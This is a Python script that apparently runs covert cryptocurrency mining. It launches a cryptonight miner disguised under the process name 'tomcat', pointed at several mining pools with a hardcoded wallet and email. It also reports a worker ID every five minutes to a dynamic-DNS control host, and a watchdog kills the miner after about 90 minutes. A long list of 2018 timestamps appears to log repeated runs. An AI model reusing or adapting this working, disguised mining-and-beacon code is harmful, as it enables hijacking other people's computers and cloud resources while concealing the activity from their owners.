import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:32:03.759489
#2018-02-17 16:17:07.117258
#2018-02-17 18:07:06.251570
#2018-02-17 19:54:06.740252
#2018-02-17 21:44:01.699775
#2018-02-17 23:28:07.287554
#2018-02-18 01:18:02.320446
#2018-02-18 03:05:05.871309
#2018-02-18 04:54:06.480046
#2018-02-18 06:46:03.989721
#2018-02-18 08:34:07.467179
#2018-02-18 10:21:05.659981
#2018-02-18 12:07:02.103163
#2018-02-18 13:52:03.875258
#2018-02-18 15:41:06.557186
#2018-02-18 17:31:01.279201
#2018-02-18 19:17:06.055577
#2018-02-18 21:04:04.376996
#2018-02-18 22:51:03.817894
#2018-02-19 00:38:05.815212
#2018-02-19 02:25:08.942732
#2018-02-19 04:12:06.137862
#2018-02-19 05:55:07.994804
#2018-02-19 07:43:06.050154
#2018-02-19 09:32:05.459866
#2018-02-19 11:22:08.598224
#2018-02-19 13:09:06.345557
#2018-02-19 14:56:02.161895
#2018-02-19 16:43:01.340808
#2018-02-19 18:29:07.620905
#2018-02-19 20:16:02.122748
#2018-02-19 22:05:01.531366
#2018-02-19 23:50:08.314087
#2018-02-20 01:37:04.168783
#2018-02-20 03:25:05.169275
#2018-02-20 05:12:07.205178
#2018-02-20 06:55:08.585759
#2018-02-20 08:42:05.228407
#2018-02-20 10:26:06.725530
#2018-02-20 12:10:07.202157
#2018-02-20 13:59:07.986978
#2018-02-20 15:43:08.160448
#2018-02-20 17:29:02.207609
#2018-02-20 19:18:05.516391
#2018-02-20 21:07:03.728147
#2018-02-20 22:51:08.322486
#2018-02-21 00:34:07.732807
#2018-02-21 02:22:01.614301
#2018-02-21 04:08:01.411483
#2018-02-21 05:55:04.867529
#2018-02-21 07:43:13.992243
#2018-02-21 09:29:03.892227
#2018-02-21 11:18:02.224622
#2018-02-21 13:06:05.908198
#2018-02-21 14:53:04.924903
#2018-02-21 16:43:04.973909
#2018-02-21 18:32:07.701774
#2018-02-21 20:16:07.908011
#2018-02-21 22:04:07.547455
#2018-02-21 23:50:06.173188
#2018-02-22 01:39:05.912168
#2018-02-22 03:26:06.599466
#2018-02-22 05:13:05.956651
#2018-02-22 06:58:03.431878
#2018-02-22 08:45:08.980679
#2018-02-22 10:32:06.954277
#2018-02-22 12:17:09.912187
#2018-02-22 14:01:13.019265
#2018-02-22 15:51:09.615360
#2018-02-22 17:38:09.315527
#2018-02-22 19:26:01.899174
#2018-02-22 21:19:09.197707
#2018-02-22 23:06:07.634207
#2018-02-23 00:54:06.655825
#2018-02-23 02:43:07.124144
#2018-02-23 04:31:01.839805
#2018-02-23 06:17:06.753831
#2018-02-23 08:05:06.600708
#2018-02-23 10:22:04.306083
#2018-02-23 12:17:01.517877
#2018-02-23 14:06:01.831648
#2018-02-23 15:55:11.437374
#2018-02-23 17:40:09.665265
#2018-02-23 19:28:03.848875
#2018-02-23 21:11:07.541701
#2018-02-23 22:58:02.172143
#2018-02-24 00:46:01.211559
#2018-02-24 02:42:04.498270
#2018-02-24 04:36:06.140618
#2018-02-24 06:21:06.370052
#2018-02-24 08:09:04.153465
#2018-02-24 09:54:04.539053
#2018-02-24 11:49:04.171936
#2018-02-24 13:40:07.653637
#2018-02-24 15:27:07.440664
#2018-02-24 17:17:05.890936
#2018-02-24 19:09:03.954797
#2018-02-24 20:57:01.830479
#2018-02-24 23:24:01.481609
#2018-02-25 02:48:05.122856
#2018-02-25 06:24:01.731237
#2018-02-25 11:39:07.986797